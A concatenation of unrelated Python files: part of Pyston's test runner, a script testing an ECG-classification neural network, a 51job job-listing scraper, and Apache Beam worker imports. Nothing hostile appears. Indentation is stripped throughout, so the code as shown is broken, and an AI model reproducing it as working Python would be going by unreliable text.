resource.setrlimit(resource.RLIMIT_CPU, (TIME_LIMIT + 1, TIME_LIMIT + 1))
MAX_MEM_MB = 100
resource.setrlimit(resource.RLIMIT_RSS, (MAX_MEM_MB * 1024 * 1024, MAX_MEM_MB * 1024 * 1024))
EXTMODULE_DIR = None
EXTMODULE_DIR_PYSTON = None
THIS_FILE = os.path.abspath(__file__)
_global_mtime = None
def get_global_mtime():
global _global_mtime
if _global_mtime is not None:
return _global_mtime
# Start off by depending on the tester itself
rtn = os.stat(THIS_FILE).st_mtime
assert os.listdir(EXTMODULE_DIR), EXTMODULE_DIR
for fn in os.listdir(EXTMODULE_DIR):
if not fn.endswith(".so"):
continue
rtn = max(rtn, os.stat(os.path.join(EXTMODULE_DIR, fn)).st_mtime)
_global_mtime = rtn
return rtn
def get_expected_output(fn):
sys.stdout.flush()
assert fn.endswith(".py")
expected_fn = fn[:-3] + ".expected"
if os.path.exists(expected_fn):
return 0, open(expected_fn).read(), ""
cache_fn = fn[:-3] + ".expected_cache"
if os.path.exists(cache_fn):
cache_mtime = os.stat(cache_fn).st_mtime
if cache_mtime > os.stat(fn).st_mtime and cache_mtime > get_global_mtime():
try:
return cPickle.load(open(cache_fn))
except (EOFError, ValueError):
pass
# TODO don't suppress warnings globally:
env = dict(os.environ)
env["PYTHONPATH"] = EXTMODULE_DIR
env["PYTHONIOENCODING"] = PYTHONIOENCODING
p = subprocess.Popen(["python", "-Wignore", fn], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=open("/dev/null"), preexec_fn=set_ulimits, env=env)
out, err = p.communicate()
code = p.wait()
r = code, out, err
assert code >= 0, "CPython exited with an unexpected exit code: %d" % (code,)
cPickle.dump(r, open(cache_fn, 'w'))
return r
def canonicalize_stderr(stderr):
"""
For a while we were trying to maintain *exact* stderr compatibility with CPython,
at least for the last line of the stderr.
It was starting to get silly to do this, so instead apply some "canonicalizations"
to map certain groups of error messages together.
"""
stderr = stderr.strip().split('\n')[-1]
substitutions = [
("NameError: global name '", "NameError: name '"),
("AttributeError: '(\w+)' object attribute '(\w+)' is read-only", "AttributeError: \\2"),
(r"TypeError: object.__new__\(\) takes no parameters", "TypeError: object() takes no parameters"),
("IndexError: list assignment index out of range", "IndexError: list index out of range"),
(r"unqualified exec is not allowed in function '(\w+)' it (.*)",
r"unqualified exec is not allowed in function '\1' because it \2"),
]
for pattern, subst_with in substitutions:
stderr = re.sub(pattern, subst_with, stderr)
return stderr
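# Illustrative example (hypothetical input): a stderr ending in
# "NameError: global name 'foo' is not defined" canonicalizes to "NameError: name 'foo' is not defined".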
failed = []
class Options(object): pass
# returns a single string, or a tuple of strings that are spliced together (with spaces between) by our caller
def run_test(fn, check_stats, run_memcheck):
opts = get_test_options(fn, check_stats, run_memcheck)
del check_stats, run_memcheck
if opts.skip:
return ("(skipped: %s)" % opts.skip) if DISPLAY_SKIPS else ""
env = dict(os.environ)
env["PYTHONPATH"] = EXTMODULE_DIR_PYSTON
env["PYTHONIOENCODING"] = PYTHONIOENCODING
run_args = [os.path.abspath(IMAGE)] + opts.jit_args + [fn]
start = time.time()
p = subprocess.Popen(run_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=open("/dev/null"),
preexec_fn=set_ulimits, env=env)
out, stderr = p.communicate()
code = p.wait()
elapsed = time.time() - start
if code >= 128:
code -= 256
return determine_test_result(fn, opts, code, out, stderr, elapsed)
def get_test_options(fn, check_stats, run_memcheck):
opts = Options()
opts.check_stats = check_stats
opts.run_memcheck = run_memcheck
opts.statchecks = []
opts.jit_args = ["-rq"] + EXTRA_JIT_ARGS
opts.collect_stats = True
opts.expected = "success"
opts.should_error = False
opts.allow_warnings = []
opts.skip = None
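    # Tests can carry directives in their leading comment lines; the loop below recognizes
    # "# statcheck:", "# run_args:", "# expected:", "# should_error", "# fail-if:",
    # "# skip-if:", "# allow-warning:" and "# no-collect-stats".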
for l in open(fn):
l = l.strip()
if not l:
continue
if l.startswith("\xef\xbb\xbf"): # BOM
l = l[3:]
if not l.startswith("#"):
break
if l.startswith("# statcheck:"):
l = l[len("# statcheck:"):].strip()
opts.statchecks.append(l)
elif l.startswith("# run_args:"):
l = l[len("# run_args:"):].split()
opts.jit_args += l
elif l.startswith("# expected:"):
assert opts.expected == "success", "Multiple 'expected:' lines found!"
opts.expected = l[len("# expected:"):].strip()
assert opts.expected != "success", "'expected: success' is the default and is ignored"
elif l.startswith("# should_error"):
opts.should_error = True
elif l.startswith("# fail-if:"):
condition = l.split(':', 1)[1].strip()
if eval(condition):
opts.expected = "fail"
elif l.startswith("# skip-if:"):
skip_if = l[len("# skip-if:"):].strip()
if eval(skip_if):
opts.skip = "skip-if: %s" % skip_if[:30]
elif l.startswith("# allow-warning:"):
opts.allow_warnings.append("Warning: " + l.split(':', 1)[1].strip())
elif l.startswith("# no-collect-stats"):
opts.collect_stats = False
if not opts.skip:
# consider other reasons for skipping file
if SKIP_FAILING_TESTS and opts.expected == 'fail':
opts.skip = 'expected to fail'
elif os.path.basename(fn).split('.')[0] in TESTS_TO_SKIP:
opts.skip = 'command line option'
assert opts.expected in ("success", "fail", "statfail"), opts.expected
if TEST_PYPY:
opts.jit_args = []
opts.collect_stats = False
opts.check_stats = False
opts.expected = "success"
if opts.collect_stats:
opts.jit_args = ['-T'] + opts.jit_args
return opts
def diff_output(expected, received, expected_file_prefix, received_file_prefix):
exp_fd, exp_fn = tempfile.mkstemp(prefix=expected_file_prefix)
rec_fd, rec_fn = tempfile.mkstemp(prefix=received_file_prefix)
os.fdopen(exp_fd, 'w').write(expected)
os.fdopen(rec_fd, 'w').write(received)
p = subprocess.Popen(["diff", "--unified=5", "-a", exp_fn, rec_fn], stdout=subprocess.PIPE, preexec_fn=set_ulimits)
diff = p.stdout.read()
assert p.wait() in (0, 1)
os.unlink(exp_fn)
os.unlink(rec_fn)
return diff
def determine_test_result(fn, opts, code, out, stderr, elapsed):
if opts.allow_warnings:
out_lines = []
for l in out.split('\n'):
for regex in opts.allow_warnings:
if re.match(regex, l):
break
else:
out_lines.append(l)
out = "\n".join(out_lines)
stats = None
if opts.collect_stats:
stats = {}
have_stats = (stderr.count("Stats:") == 1 and stderr.count("(End of stats)") == 1)
if code >= 0:
if not have_stats:
color = 31
msg = "no stats available"
if opts.expected == "fail":
return success_message("Expected failure (no stats found)")
elif KEEP_GOING:
failed.append(fn)
if VERBOSE >= 1:
return "\033[%dmFAILED\033[0m (%s)\n%s" % (color, msg, stderr)
else:
return "\033[%dmFAILED\033[0m (%s)" % (color, msg)
else:
raise Exception("%s\n%s" % (msg, stderr))
assert have_stats
if have_stats:
assert stderr.count("Stats:") == 1
stderr, stats_str = stderr.split("Stats:")
stats_str, stderr_tail = stats_str.split("(End of stats)\n")
stderr += stderr_tail
other_stats_str, counter_str = stats_str.split("Counters:")
for l in counter_str.strip().split('\n'):
assert l.count(':') == 1, l
k, v = l.split(':')
stats[k.strip()] = int(v)
last_stderr_line = stderr.strip().split('\n')[-1]
if EXIT_CODE_ONLY:
# fools the rest of this function into thinking the output is OK & just checking the exit code.
# there oughtta be a cleaner way to do this.
expected_code, expected_out, expected_err = 0, out, stderr
else:
# run CPython to get the expected output
expected_code, expected_out, expected_err = get_expected_output(fn)
color = 31 # red
if code != expected_code:
if code == 0:
err = "(Unexpected success)"
else:
err = last_stderr_line
if code == -signal.SIGALRM:
msg = "Timed out"
color = 33 # yellow
elif code == -signal.SIGKILL:
msg = "Killed!"
else:
msg = "Exited with code %d (expected code %d)" % (code, expected_code)
if opts.expected == "fail":
return success_message("Expected failure (got code %d, should be %d)" % (code, expected_code))
elif KEEP_GOING:
failed.append(fn)
if VERBOSE >= 1:
return "\033[%dmFAILED\033[0m (%s)\n%s" % (color, msg, stderr)
else:
return "\033[%dmFAILED\033[0m (%s)" % (color, msg)
else:
raise Exception("%s\n%s\n%s" % (msg, err, stderr))
elif opts.should_error == (code == 0):
if code == 0:
msg = "Exited successfully; remove '# should_error' if this is expected"
else:
msg = "Exited with code %d; add '# should_error' if this is expected" % code
if KEEP_GOING:
failed.append(fn)
return "\033[%dmFAILED\033[0m (%s)" % (color, msg)
else:
            # show the last line of stderr so we have some idea of what went wrong
print "Last line of stderr: " + last_stderr_line
raise Exception(msg)
elif out != expected_out:
if opts.expected == "fail":
return success_message("Expected failure (bad output)")
else:
diff = diff_output(expected_out, out, "expected_", "received_")
if KEEP_GOING:
failed.append(fn)
if VERBOSE >= 1:
return "\033[%dmFAILED\033[0m (bad output)\n%s" % (color, diff)
else:
return "\033[%dmFAILED\033[0m (bad output)" % (color,)
else:
raise Exception("Failed on %s:\n%s" % (fn, diff))
elif not TEST_PYPY and canonicalize_stderr(stderr) != canonicalize_stderr(expected_err):
if opts.expected == "fail":
return success_message("Expected failure (bad stderr)")
else:
diff = diff_output(expected_err, stderr, "expectederr_", "receivederr_")
if KEEP_GOING:
failed.append(fn)
if VERBOSE >= 1:
return "\033[%dmFAILED\033[0m (bad stderr)\n%s" % (color, diff)
else:
return "\033[%dmFAILED\033[0m (bad stderr)" % (color,)
else:
raise Exception((canonicalize_stderr(stderr), canonicalize_stderr(expected_err)))
elif opts.expected == "fail":
if KEEP_GOING:
failed.append(fn)
return "\033[31mFAILED\033[0m (unexpected success)"
raise Exception("Unexpected success on %s" % fn)
r = ("Correct output (%5.1fms)" % (elapsed * 1000,),)
if opts.check_stats:
def noninit_count(s):
return stats.get(s, 0) - stats.get("_init_" + s, 0)
for l in opts.statchecks:
test = eval(l)
if not test:
if opts.expected == "statfail":
r += ("(expected statfailure)",)
break
else:
msg = ()
m = re.match("""stats\[['"]([\w_]+)['"]]""", l)
if m:
statname = m.group(1)
msg = (l, statname, stats[statname])
m = re.search("""noninit_count\(['"]([\w_]+)['"]\)""", l)
if m and not msg:
statname = m.group(1)
msg = (l, statname, noninit_count(statname))
if not msg:
msg = (l, stats)
elif KEEP_GOING:
failed.append(fn)
if VERBOSE:
return r + ("\033[31mFailed statcheck\033[0m\n%s" % (msg,),)
else:
return r + ("\033[31mFailed statcheck\033[0m",)
else:
raise Exception(msg)
else:
# only can get here if all statchecks passed
if opts.expected == "statfail":
if KEEP_GOING:
failed.append(fn)
return r + ("\033[31mUnexpected statcheck success\033[0m",)
else:
raise Exception(("Unexpected statcheck success!", opts.statchecks, stats))
else:
r += ("(ignoring stats)",)
if opts.run_memcheck:
if code == 0:
start = time.time()
p = subprocess.Popen(["valgrind", "--tool=memcheck", "--leak-check=no"] + run_args, stdout=open("/dev/null", 'w'), stderr=subprocess.PIPE, stdin=open("/dev/null"))
out, err = p.communicate()
assert p.wait() == 0
if "Invalid read" not in err:
elapsed = (time.time() - start)
r += ("Memcheck passed (%4.1fs)" % (elapsed,),)
else:
if KEEP_GOING:
failed.append(fn)
return r + ("\033[31mMEMCHECKS FAILED\033[0m",)
else:
raise Exception(err)
else:
r += ("(Skipping memchecks)",)
return success_message(r)
q = Queue.Queue()
cv = threading.Condition()
results = {}
quit = {}
def worker_thread():
while not quit:
try:
job = q.get()
if job is None:
break
results[job[0]] = run_test(*job)
with cv:
cv.notifyAll()
except:
import traceback
# traceback.print_exc()
quit[job[0]] = job[0] + ':\n' + traceback.format_exc()
results[job[0]] = None
with cv:
cv.notifyAll()
# os._exit(-1)
def fileSize(fn):
return os.stat(fn).st_size
# return len(list(open(fn)))
# our arguments
parser = argparse.ArgumentParser(description='Runs Pyston tests.')
parser.add_argument('-m', '--run-memcheck', action='store_true', help='run memcheck')
parser.add_argument('-j', '--num-threads', metavar='N', type=int, default=NUM_THREADS,
help='number of threads')
parser.add_argument('-k', '--keep-going', default=KEEP_GOING, action='store_true',
help='keep going after test failure')
parser.add_argument('-R', '--image', default=IMAGE,
help='the executable to test (default: %s)' % IMAGE)
parser.add_argument('-K', '--no-keep-going', dest='keep_going', action='store_false',
help='quit after test failure')
parser.add_argument('-a', '--extra-args', default=[], action='append',
help="additional arguments to pyston (must be invoked with equal sign: -a=-ARG)")
parser.add_argument('-t', '--time-limit', type=int, default=TIME_LIMIT,
help='set time limit in seconds for each test')
parser.add_argument('-s', '--skip-tests', type=str, default='',
help='tests to skip (comma-separated)')
parser.add_argument('-e', '--exit-code-only', action='store_true',
help="only check exit code; don't run CPython to get expected output to compare against")
parser.add_argument('-q', '--quiet', action='store_true',
help="Only display failing tests")
parser.add_argument('--skip-failing', action='store_true',
help="skip tests expected to fail")
parser.add_argument('--order-by-mtime', action='store_true',
help="order test execution by modification time, instead of file size")
parser.add_argument('test_dir')
parser.add_argument('pattern', nargs='*')
def main(orig_dir):
global KEEP_GOING
global IMAGE
global EXTRA_JIT_ARGS
global TIME_LIMIT
global TEST_DIR
global FN_JUST_SIZE
global TESTS_TO_SKIP
global EXIT_CODE_ONLY
global SKIP_FAILING_TESTS
global VERBOSE
global EXTMODULE_DIR_PYSTON
global EXTMODULE_DIR
global DISPLAY_SUCCESSES
global IS_OPTIMIZED
run_memcheck = False
opts = parser.parse_args()
run_memcheck = opts.run_memcheck
NUM_THREADS = opts.num_threads
IMAGE = os.path.join(orig_dir, opts.image)
KEEP_GOING = opts.keep_going
EXTRA_JIT_ARGS += opts.extra_args
TIME_LIMIT = opts.time_limit
TESTS_TO_SKIP = opts.skip_tests.split(',')
TESTS_TO_SKIP = filter(bool, TESTS_TO_SKIP) # "".split(',') == ['']
EXIT_CODE_ONLY = opts.exit_code_only
SKIP_FAILING_TESTS = opts.skip_failing
if opts.quiet:
DISPLAY_SUCCESSES = False
TEST_DIR = os.path.join(orig_dir, opts.test_dir)
EXTMODULE_DIR_PYSTON = os.path.abspath(os.path.dirname(os.path.realpath(IMAGE)) + "/test/test_extension/")
# EXTMODULE_DIR = os.path.abspath(os.path.dirname(os.path.realpath(IMAGE)) + "/test/test_extension/build/lib.linux-x86_64-2.7/")
EXTMODULE_DIR = os.path.abspath(orig_dir) + "/test/test_extension/build/lib.linux-x86_64-2.7/"
patterns = opts.pattern
IS_OPTIMIZED = int(subprocess.check_output([IMAGE, "-c", 'import sysconfig; print int("-O0" not in sysconfig.get_config_var(\"CFLAGS\"))']))
if not patterns and not TESTS_TO_SKIP:
TESTS_TO_SKIP = ["t", "t2", "t3"]
assert os.path.isdir(TEST_DIR), "%s doesn't look like a directory with tests in it" % TEST_DIR
if TEST_DIR.rstrip('/').endswith("cpython") and not EXIT_CODE_ONLY:
print >>sys.stderr, "Test directory name ends in cpython; are you sure you don't want --exit-code-only?"
if TEST_DIR.rstrip('/').endswith("extra") or TEST_DIR.rstrip('/').endswith("integration"):
if not os.path.exists(os.path.join(TEST_DIR, '../lib/virtualenv/virtualenv.py')):
print "Looks like you don't have the integration-test repositories checked out; skipping them."
print "If you would like to run them, please run:"
print "git submodule update --init --recursive", os.path.join(TEST_DIR, "../lib")
sys.exit(0)
# do we need this any more?
IGNORE_STATS = ["%s/%d.py" % (TEST_DIR, i) for i in ()] + []
tests = [t for t in glob.glob("%s/*.py" % TEST_DIR)]
LIB_DIR = os.path.join(sys.prefix, "lib/python2.7")
for t in tests:
bn = os.path.basename(t)
assert bn.endswith(".py")
module_name = bn[:-3]
if os.path.exists(os.path.join(LIB_DIR, module_name)) or \
os.path.exists(os.path.join(LIB_DIR, module_name + ".py")) or \
module_name in sys.builtin_module_names:
raise Exception("Error: %s hides builtin module '%s'" % (t, module_name))
if patterns:
filtered_tests = []
for t in tests:
if any(re.match(os.path.join(TEST_DIR, p) + ".*\.py", t) for p in patterns):
filtered_tests.append(t)
tests = filtered_tests
if not tests:
# print >>sys.stderr, "No tests matched the given patterns. OK by me!"
# this can happen legitimately in e.g. `make check_test_foo` if test_foo.py is a CPython regression test.
sys.exit(0)
FN_JUST_SIZE = max(20, 2 + max(len(os.path.basename(fn)) for fn in tests))
if TEST_PYPY:
IMAGE = '/usr/local/bin/pypy'
if not patterns:
if opts.order_by_mtime:
tests.sort(key=lambda fn:os.stat(fn).st_mtime, reverse=True)
else:
tests.sort(key=fileSize)
for fn in tests:
check_stats = fn not in IGNORE_STATS
q.put((fn, check_stats, run_memcheck))
threads = []
for i in xrange(NUM_THREADS):
t = threading.Thread(target=worker_thread)
t.setDaemon(True)
t.start()
threads.append(t)
    for i in xrange(NUM_THREADS):
        q.put(None)  # one sentinel per worker thread so each worker can exit
for fn in tests:
with cv:
while fn not in results:
try:
cv.wait(1)
except KeyboardInterrupt:
print >>sys.stderr, "Interrupted"
sys.exit(1)
if results[fn] is None:
assert quit
print quit.pop(fn).strip()
for fn, s in quit.items():
print "(%s also failed)" % fn
sys.exit(1)
break
if results[fn]:
name = os.path.basename(fn).rjust(FN_JUST_SIZE)
msgs = results[fn]
if isinstance(msgs,str):
msgs = [msgs]
print ' '.join([name] + list(msgs))
for t in threads:
t.join()
if failed:
sys.exit(1)
if __name__ == "__main__":
origdir = os.getcwd()
tmpdir = tempfile.mkdtemp()
os.chdir(tmpdir)
try:
main(origdir)
finally:
shutil.rmtree(tmpdir)
# adding a comment here to invalidate cached expected results
|
EMD_Parallel_Test.py
|
import pyhht
from pyhht.emd import EMD
from pyhht.visualization import plot_imfs
import numpy as np
import math
from pyhht.utils import extr
from pyhht.utils import get_envelops
import matplotlib.pyplot as plt
from pyhht.utils import inst_freq
import wfdb
import os
import sys
import glob
import GPUtil
import config
import EMD_Models as M
from Queue import Queue
import threading
import tensorflow as tf
import time
from keras.models import model_from_json
import pickle
import Confusion_Matrix_Parallel as CM
global C,diseases,IMF_1Q,IMF_2Q,IMF_3Q,IMF_4Q,IMF_5Q,IMF_6Q,number_test_image,finished,q,true_classes
global fo
fo = "./Outputs-Parallel-PTB-8-class-Alexnet-6IMF/"
C = config.Config()
'''
#For MIT-BIH
diseases={'SBR':3,
'N':1,
'P':2,
'AFIB':0}
'''
#Saint Petersburg
#diseases = {'AV Nodal Block':0,'Acute MI':1, 'Atrial Fibrilation':2,'Coronary artery disease':3,'Earlier MI':4, 'Healthy':5,'Sinus node dysfunction':6,'Transient ischemic attack':7,'WPW':8}
IMF_1Q = Queue(maxsize = 500)
IMF_2Q = Queue(maxsize = 500)
IMF_3Q = Queue(maxsize = 500)
IMF_4Q = Queue(maxsize = 500)
IMF_5Q = Queue(maxsize = 500)
IMF_6Q = Queue(maxsize = 500)
q=[]
diseases={'Myocardial infarction':5,
'Healthy control':3,
'Cardiomyopathy':1,
'Bundle branch block':0,
'Dysrhythmia':2,
'Hypertrophy':4,
'Valvular heart disease':7,
'Myocarditis':6}
def result_analysis(number_test_image):
result=[]
detailed_output = open(fo+'Test_Result/detailed_prob/detailed_parallel_probability_test.txt','w')
max_output = open(fo+'Test_Result/Maximum_Prob/maximum_parallel_probability_test.txt','w')
max_output.write('#IMFnumber, max_probability, predicted class, original class\n')
for i in range(0,number_test_image):
v=q[i][0].index(max(q[i][0]))
tr=diseases[str(true_classes[i])]
string = 'IMF_'
for z in range(0,C.classes):
string = string + ','+str(q[i][0][z])
string = string +','+str(round(max(q[i][0]),5))+','+str(tr)+'\n'
detailed_output.write(string)
string = 'IMF_,'+str(round(max(q[i][0]),5))+','+str(v)+','+str(tr)+'\n'
max_output.write(string)
if(v == tr):
result.append(1)
else:
result.append(0)
#save it
with open(fo+"Test_Result/result_parallel__test.pickle","wb") as f:
pickle.dump(result,f)
    #result holds 1 at indices where the prediction matched the true class and 0 where it did not
#Calculate the mean, accuracy, std etc
result_1 = result.count(1)
result_length = len(result)
accuracy = (result_1/float(result_length))*100
with open(fo+"Test_Result/result_parallel_test.txt",'w') as f:
string = 'Accuracy = '+str(accuracy)
f.write(string)
print('\nTotal Percentage of match = {}'.format(accuracy))
print('\n\n\nFinished Testing--------Thank You for Using My Code\nNAHIAN IBN HASAN\nDepartment of EEE')
print('Bangladesh University of Engineering and Technology\nBangladesh\ngmail: nahianhasan1994@gmail.com')
print('LinkedIn Profile: ')
detailed_output.close()
max_output.close()
#CM.Confusion_Matrix_Plot()
def Evaluate_Test_IMFs():
global q,IMF_1Q,IMF_2Q,IMF_3Q,IMF_4Q,IMF_5Q,IMF_6Q
'''
deviceIDs=[]
while not deviceIDs:
deviceIDs = GPUtil.getAvailable(order='first',limit=1,maxMemory=0.85,maxLoad=0.99)
print 'searching for GPU to be available. Please wait.....'
print 'GPU Found...Starting Training\n'
# Assume that you have 12GB of GPU memory and want to allocate ~4GB:
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.15)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))
'''
json_file = open(fo+'Final_Weights/model_parallel.json' ,'r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
# load weights into new model
weight_file = fo+"Training_Records/weights_parallel_best_of_IMF.hdf5"
model.load_weights(weight_file)
print "\n\nLoaded ",weight_file," from disk\n\n"
model.compile(loss = 'categorical_crossentropy', optimizer = C.optimizer, metrics = ['accuracy'])
read_data=0
    track = 0  # counts consecutive empty polls; used to detect the end of the test set
while(1):
if not IMF_1Q.empty():
read_data=read_data+1
            print('Test data running = {}'.format(read_data))
arr_1 = np.expand_dims((np.array([IMF_1Q.get(),])),axis=2)
arr_2 = np.expand_dims((np.array([IMF_2Q.get(),])),axis=2)
arr_3 = np.expand_dims((np.array([IMF_3Q.get(),])),axis=2)
arr_4 = np.expand_dims((np.array([IMF_4Q.get(),])),axis=2)
arr_5 = np.expand_dims((np.array([IMF_5Q.get(),])),axis=2)
arr_6 = np.expand_dims((np.array([IMF_6Q.get(),])),axis=2)
q.append(model.predict([arr_1,arr_2,arr_3,arr_4,arr_5,arr_6]).tolist())
track=0
else:
track=track+1
if track==2000:
break
continue
print ('Finished Testing')
    #q now holds, for each test example, the predicted probabilities of every class from the parallel model
    #for example, q[0][0] is a list with one probability per class
    #take the index of the highest probability and compare it with the label-encoded disease index defined above
result_analysis(number_test_image)
def Main():
global number_test_image,IMF_1Q,IMF_2Q,IMF_3Q,IMF_4Q,IMF_5Q,IMF_6Q,true_classes
print('Reading IMF csv data files for testing')
IMF1_test = open(C.IMF_csv_path+'IMF1_test.csv','r')
IMF2_test = open(C.IMF_csv_path+'IMF2_test.csv','r')
line1 = IMF1_test.readline()
line2 = IMF2_test.readline()
if C.number_of_IMFs >= 3:
IMF3_test = open(C.IMF_csv_path+'IMF3_test.csv','r')
line3 = IMF3_test.readline()
if C.number_of_IMFs >= 4:
IMF4_test = open(C.IMF_csv_path+'IMF4_test.csv','r')
line4 = IMF4_test.readline()
if C.number_of_IMFs >= 5:
IMF5_test = open(C.IMF_csv_path+'IMF5_test.csv','r')
line5 = IMF5_test.readline()
if C.number_of_IMFs >= 6:
IMF6_test = open(C.IMF_csv_path+'IMF6_test.csv','r')
line6 = IMF6_test.readline()
print("Finished Loading Testing Data")
print('Reading Models')
t = threading.Thread(target=Evaluate_Test_IMFs, name='thread1')
t.start()
true_classes = []
number_test_image = 0
while (line1 and line2 and line3 and line4 and line5 and line6):
splitted1 = line1.split(',')
splitted_1 = splitted1[0:C.samplenumber]
splitted2 = line2.split(',')
splitted_2 = splitted2[0:C.samplenumber]
if C.number_of_IMFs >= 3:
splitted3 = line3.split(',')
splitted_3 = splitted3[0:C.samplenumber]
if C.number_of_IMFs >= 4:
splitted4 = line4.split(',')
splitted_4 = splitted4[0:C.samplenumber]
if C.number_of_IMFs >= 5:
splitted5 = line5.split(',')
splitted_5 = splitted5[0:C.samplenumber]
if C.number_of_IMFs >= 6:
splitted6 = line6.split(',')
splitted_6 = splitted6[0:C.samplenumber]
class_name = str(splitted1[C.samplenumber][:-1])
'''
#for MIT-BIH
if class_name in ['AFL','B','T','VFL','NOD','VT','IVR']:
line1 = IMF1_test.readline()
line2 = IMF2_test.readline()
line3 = IMF3_test.readline()
line4 = IMF4_test.readline()
line5 = IMF5_test.readline()
line6 = IMF6_test.readline()
continue
'''
if class_name in ['Miscellaneous']:
line1 = IMF1_test.readline()
line2 = IMF2_test.readline()
line3 = IMF3_test.readline()
line4 = IMF4_test.readline()
line5 = IMF5_test.readline()
line6 = IMF6_test.readline()
continue
true_classes.append(class_name)
splitted1 = np.asarray(splitted_1)
splitted2 = np.asarray(splitted_2)
splitted3 = np.asarray(splitted_3)
splitted4 = np.asarray(splitted_4)
splitted5 = np.asarray(splitted_5)
splitted6 = np.asarray(splitted_6)
try:
IMF_1Q.put(splitted1)
IMF_2Q.put(splitted2)
if C.number_of_IMFs >= 3:
IMF_3Q.put(splitted3)
if C.number_of_IMFs >= 4:
IMF_4Q.put(splitted4)
if C.number_of_IMFs >= 5:
IMF_5Q.put(splitted5)
if C.number_of_IMFs >= 6:
IMF_6Q.put(splitted6)
number_test_image = number_test_image+1
print('Test data in the queue so far = {}'.format(number_test_image))
line1 = IMF1_test.readline()
line2 = IMF2_test.readline()
line3 = IMF3_test.readline()
line4 = IMF4_test.readline()
line5 = IMF5_test.readline()
line6 = IMF6_test.readline()
except:
print sys.exc_info(),'\n'
line1 = IMF1_test.readline()
line2 = IMF2_test.readline()
line3 = IMF3_test.readline()
line4 = IMF4_test.readline()
line5 = IMF5_test.readline()
line6 = IMF6_test.readline()
#Check whether the testing has been completed
#if __name__ == '__Main__':
Main()
|
QCWY.py
|
__author__ = 'Joynice'
from utils.utils import get_header, get_time
import requests
import queue
from lxml import etree
import threading
import os
import csv
class QCWY(object):
'''
    51job (Qianchengwuyou) job-listing spider.
    :param
    Inputs: keyword, city, number of threads
    Output: csv file
'''
def __init__(self, keyword, city='北京', thread=10, path=os.getcwd()):
self.keyword = keyword
self.city = city
self.thread = thread
self.csv_header = ['职位名称', '详细链接', '公司名称', '工作地点', '薪资', '发布时间', '职位信息', '公司信息']
self.baseurl = 'https://search.51job.com/list/'
self.header = get_header()
self.path = path
self.pagequeue = queue.Queue()
self.jobqueue = queue.Queue()
def _get_city_code(self):
url = 'https://js.51jobcdn.com/in/js/2016/layer/area_array_c.js'
req = requests.get(url, headers=self.header).text
a = req.find(self.city)
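        # area_array_c.js presumably maps codes to city names as "<code>":"<city>";
        # the six characters ending three characters before the city name are taken as the city code (heuristic slice).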
return req[a - 9:a - 3]
def _get_max_page(self):
city_code = self._get_city_code()
url = self.baseurl + '{},000000,0000,00,9,99,{},2,1.html'.format(city_code, self.keyword)
req = requests.get(url=url, headers=self.header)
req.encoding = 'gbk'
html = etree.HTML(req.text)
max_page = html.xpath('//*[@id="resultList"]/div[2]/div[5]/text()')[1][3:]
for page in range(1, int(max_page) + 1):
page_url = self.baseurl + '{},000000,0000,00,9,99,{},2,{}.html'.format(city_code, self.keyword, page)
self.pagequeue.put(page_url)
def Spider(self):
while not self.pagequeue.empty():
url = self.pagequeue.get()
            print('Crawling: {}'.format(url))
req = requests.get(url, headers=get_header())
req.encoding = 'gbk'
html = etree.HTML(req.text)
for i in range(4, 54):
try:
title = html.xpath('//*[@id="resultList"]/div[{}]/p/span/a/@title'.format(i))
                    if not title:  # no more listings on this page
break
name = html.xpath('//*[@id="resultList"]/div[{}]/span[1]/a/text()'.format(i))
url = html.xpath('//*[@id="resultList"]/div[{}]/p/span/a/@href'.format(i))
print(url[0])
area = html.xpath('//*[@id="resultList"]/div[{}]/span[2]/text()'.format(i))
salery = html.xpath('//*[@id="resultList"]/div[{}]/span[3]/text()'.format(i))
time = html.xpath('//*[@id="resultList"]/div[{}]/span[4]/text()'.format(i))
req1 = requests.get(url[0], headers=get_header())
req1.encoding = 'gb2312'
html1 = etree.HTML(req1.text)
detail = ''.join(html1.xpath('//*[@class="bmsg job_msg inbox"]//*/text()'))
if detail.isspace():
detail = ''.join(html1.xpath('//*[@class="bmsg job_msg inbox"]/text()'))
print(detail)
gongsi = ''.join(html1.xpath('//*[@class="tmsg inbox"]/text()'))
if gongsi.isspace():
gongsi = ''.join(html1.xpath('//*[@class="tmsg inbox"]//*/text()'))
data = {
"职位名称": title[0],
"详细链接": url[0],
"公司名称": name[0],
"工作地点": area[0],
"薪资": salery[0] if len(salery)!=0 else None,
"发布时间": time[0],
"职位信息": detail,
"公司信息": gongsi
}
self.jobqueue.put(data)
except:
continue
def run(self):
self._get_max_page()
thread_list = []
for i in range(self.thread):
t = threading.Thread(target=self.Spider)
thread_list.append(t)
for t in thread_list:
t.setDaemon(True)
t.start()
for t in thread_list:
t.join()
if os.path.exists(self.path):
data_list = []
self.path = os.path.join(self.path,'save-data')
while not self.jobqueue.empty():
data_list.append(self.jobqueue.get())
with open(os.path.join(self.path, '前途无忧招聘_关键词_{}_城市_{}.csv'.format(self.keyword, self.city)), 'w',
newline='', encoding='utf-8-sig') as f:
f_csv = csv.DictWriter(f, self.csv_header)
f_csv.writeheader()
f_csv.writerows(data_list)
if __name__ == '__main__':
a = QCWY(keyword='java', city='北京').run()
|
sdk_worker_main.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK Fn Harness entry point."""
from __future__ import absolute_import
import http.server
import json
import logging
import os
import re
import sys
import threading
import traceback
from builtins import object
from google.protobuf import text_format # type: ignore # not in typeshed
from apache_beam.internal import pickler
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import ProfilingOptions
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.internal import names
from apache_beam.runners.worker.log_handler import FnApiLogRecordHandler
from apache_beam.runners.worker.sdk_worker import SdkHarness
